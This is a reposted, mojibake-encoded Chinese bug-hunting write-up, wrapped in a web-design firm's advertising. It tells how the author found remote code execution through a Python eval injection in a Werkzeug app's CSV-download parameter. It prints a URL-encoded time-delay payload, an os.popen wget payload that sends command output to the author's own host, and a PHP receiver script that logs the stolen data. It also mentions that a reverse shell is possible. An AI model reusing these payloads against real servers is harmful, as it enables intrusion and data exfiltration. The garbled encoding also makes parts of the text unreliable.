如何解析曲折的RCE挖掘分析

這期內(nèi)容當(dāng)中小編將會(huì)給大家?guī)?lái)有關(guān)如何解析曲折的RCE挖掘分析,文章內(nèi)容豐富且以專(zhuān)業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

創(chuàng)新互聯(lián)公司-專(zhuān)業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性?xún)r(jià)比黃陂網(wǎng)站開(kāi)發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫(kù),直接使用。一站式黃陂網(wǎng)站制作公司更省心,省錢(qián),快速模板網(wǎng)站建設(shè)找我們,業(yè)務(wù)覆蓋黃陂地區(qū)。費(fèi)用合理售后完善,10余年實(shí)體公司更值得信賴(lài)。

簡(jiǎn)單記錄一下這個(gè)漏洞,沒(méi)啥特殊的手法,就是細(xì)心與fuzz

目標(biāo)應(yīng)用有一個(gè)下載文件的功能,你可以以csv格式下載報(bào)告

如何解析曲折的RCE挖掘分析  

抓包結(jié)果如下:

如何解析曲折的RCE挖掘分析  

看起來(lái)好像沒(méi)啥問(wèn)題,但是響應(yīng)中的Werkzaug與python吸引了我的注意,不了解Werkzaug的可以去看一下

我嘗試著用一些其他的payload替換了params參數(shù)的值,都是報(bào)錯(cuò),看起來(lái)真就沒(méi)啥問(wèn)題,我都準(zhǔn)備不看這個(gè)點(diǎn)了,但是,當(dāng)我用空參數(shù)的時(shí)候,服務(wù)器返回了500錯(cuò)誤

如何解析曲折的RCE挖掘分析  

這說(shuō)明這個(gè)參數(shù)還是會(huì)影響服務(wù)器的運(yùn)行的嘛(當(dāng)然也不一定,這里只是我的一個(gè)猜測(cè)),為了進(jìn)一步確定,我開(kāi)始fuzz這個(gè)參數(shù)

最后把各種報(bào)錯(cuò)整理了一下,發(fā)現(xiàn)所有和python相關(guān)的payload都報(bào)了500錯(cuò)誤????

看起來(lái)有戲,于是把python rce的payload進(jìn)行了一下url編碼,

eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29

成功執(zhí)行,服務(wù)器產(chǎn)生了延時(shí):

如何解析曲折的RCE挖掘分析  

由于數(shù)據(jù)不會(huì)回顯,我們就只有用其他手法來(lái)外帶數(shù)據(jù)了,還記得上一篇文章的內(nèi)容嗎?

沒(méi)有看上一篇文章的快回頭去瞅瞅????

構(gòu)造payload:

eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://axin.com:8000/shell.php?cmd="$(ls -la)”)read()”””,’’,’single’))

然后在我們的服務(wù)器axin.com上部署一份shell.php文件,文件內(nèi)容如下:

<?php
$a = fopen('POC.txt', 'a');
fwrite($a, $_GET["cmd"]);
fclose($a);
?>
 

發(fā)送payload,并查看POC.txt文件的內(nèi)容:

如何解析曲折的RCE挖掘分析  

nice的不得了,當(dāng)然,也可以直接彈shell

上述就是小編為大家分享的如何解析曲折的RCE挖掘分析了,如果剛好有類(lèi)似的疑惑,不妨參照上述分析進(jìn)行理解。如果想知道更多相關(guān)知識(shí),歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

當(dāng)前標(biāo)題:如何解析曲折的RCE挖掘分析
轉(zhuǎn)載源于:http://bm7419.com/article38/iippsp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供移動(dòng)網(wǎng)站建設(shè)軟件開(kāi)發(fā)、做網(wǎng)站定制網(wǎng)站、網(wǎng)站建設(shè)面包屑導(dǎo)航

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

網(wǎng)站優(yōu)化排名